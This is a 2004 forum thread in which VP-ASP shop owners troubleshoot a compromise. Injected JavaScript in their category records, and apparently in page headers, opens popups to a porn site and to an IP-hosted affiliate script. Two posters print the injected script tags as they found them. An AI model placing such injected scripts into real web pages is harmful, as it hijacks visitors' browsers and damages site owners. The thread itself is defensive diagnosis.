Author |
Topic |
|
maduko
VP-CART New User
52 Posts |
Posted - March 07 2004 : 20:53:49
|
Shop pages are opening a popup window. When closed it opens a spam page from freesextogo.com. Has anyone else experienced this?
The source of the popup follows...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Untitled</title> </head> <script language="JavaScript"> function ourl1() { window.open("http://www.freesextogo.com", "_blank"); } </script> <body> <body onunload="javascript:ourl1()"> </body> </html>
|
|
support
Administrator
4679 Posts |
Posted - March 07 2004 : 21:04:10
|
You site has probably been hacked. Take a look in your product and category records to see if a javascript has been put into one of your product description.
Please check our security notices and fixes www.vpasp.com/virtprog/info/faq_security.htm
VP-ASP Support
|
|
|
maduko
VP-CART New User
52 Posts |
Posted - March 07 2004 : 21:10:41
|
I get this popup on any page that loads the shop&db and shopfileio includes. You think I should start looking in the products and categories?
I will review the security notice again- I have tried to stay up on all of those.
|
|
|
maduko
VP-CART New User
52 Posts |
Posted - March 07 2004 : 21:14:25
|
You were right. The Publications category had been worked over with this addition...
<br> <br> <SCRIPT LANGUAGE=JavaScript> window.open("http://69.47.51.171/links/aff/aff.php", "_blank","toolbar=no, scrollbars=no, menubar=no, width=1, height=1, left=1, top=1"); </SCRIPT> <br>
Thanks for your help.
|
|
|
tonyhrx
Starting Member
United Kingdom
3 Posts |
Posted - March 09 2004 : 04:27:50
|
OK I got hacked this morning with this pop up. Hackers had changed shoppageheader.asp and had also managed to alter a category item in the shopping400.mdb file so that the pop-up remained.
Tony Horrocks |
|
|
tonyhrx
Starting Member
United Kingdom
3 Posts |
Posted - March 09 2004 : 05:12:07
|
What's worrying is that we have firewalls up, follow VPASP security advice yet someone is still able to do this sort of stuff. Anyone any ideas?
Tony Horrocks |
|
|
devshb
Senior Member
United Kingdom
1904 Posts |
Posted - March 09 2004 : 07:11:13
|
I could be wrong, but...
if the hacker actually managed to change the asp code itself (as opposed to just getting into the database), then it looks like it's your server/directories that are vulnerable, not just vp-asp stuff.
it looks like the hacker managed to get direct access to your site with something like ftp.
obviously I don't know anything about your server, but if you've got something like an admin user in the database with the same id/pwd as the server/ftp connection details, then someone might have used that.
or, it could be an inside-job.
whatever it is, i agree it's pretty scary.
there is something else which might be worth mentioning here, which is that if you upload all your default vpasp stuff to a publicy available domain, and then do the security measures afterwards, you'd leave yourself vulnerable in between the initial-posting and the security-update, during which time someone might have been able to grab/do what they needed so that they could then go back again later on, even if the security measures are in place. it's just a personal view, but because of this potential vulnerability-time, i'd always implement the standard vp-asp-advised security measures, and then after that'd been done, I'd do some of those things again (changing the admin login page again, changing ALL the admin ids/pwds again), and I wouldn't put anything into the database until that'd been done. Then, I'd check the database contents are blank/default and that no spurious files are on the server.
Edited by - devshb on March 09 2004 07:20:43 |
|
|
sfarling
Starting Member
3 Posts |
Posted - March 09 2004 : 09:02:49
|
Got me too. Scott
|
|
|
siraj
VP-CART New User
USA
194 Posts |
Posted - March 09 2004 : 14:35:53
|
I think in maduko case, the did not get into the server but only te database and the admin pages. Once you get control of the admin page, they have put the above html/js script in the category table. So when asp try to get the category field populate into asp page, then we see the result. I dont believe that they have get control of the server. GOOD LUCK. SJ.
[email protected] |
|
|
devshb
Senior Member
United Kingdom
1904 Posts |
Posted - March 09 2004 : 15:05:47
|
i agree; i may have caused undue alarm there; i was only talking about tonyhrx's posting (the "Hackers had changed shoppageheader.asp" bit) if the javascript had been added to the category, then i guess it would give the appearance of changing shoppageheader.asp, but it wouldn't have actually caused a physical change to the file.
but if shoppageheader.asp had physically been changed, then there would be a larger more serious problem.
Edited by - devshb on March 09 2004 15:08:50 |
|
|
siraj
VP-CART New User
USA
194 Posts |
Posted - March 09 2004 : 22:22:50
|
I agree with devshb. What is scary is tonyhrx's case, he got firewall set up and still the hackers manages to get? Something really missing! There are couple of possiblities like devshb said, hackers might have downloaded the db and coincidence if you are using the same admin/pass for the server then forget it!!! But again with fire wall setup how can hackers change the shopage_header? Simply I did not get it. Is there any better explanation? Second chance is, you directory permision might have setup incorrectly so hackers can do whatever they want! GOOD LUCK. SJ.
[email protected] |
|
|
Cam
VP-CART Super User
Australia
361 Posts |
|
dfreeman
Starting Member
USA
6 Posts |
Posted - March 29 2004 : 09:28:22
|
The freesextogo.com link was just sent last night to all of the shoppers in one of my online stores using vpasp. The database is SQL and to my knowledge we have implemented all of the recommended security fixes. The email came from the email address used by the shopping cart and the subject line was 'Shopping Order'.
Not so good, since this site is a Christian ministry and now its shoppers all got an email link to a porn site, seemingly from the ministry.
David Freeman |
|
|
Cam
VP-CART Super User
Australia
361 Posts |
|
|
Topic |
|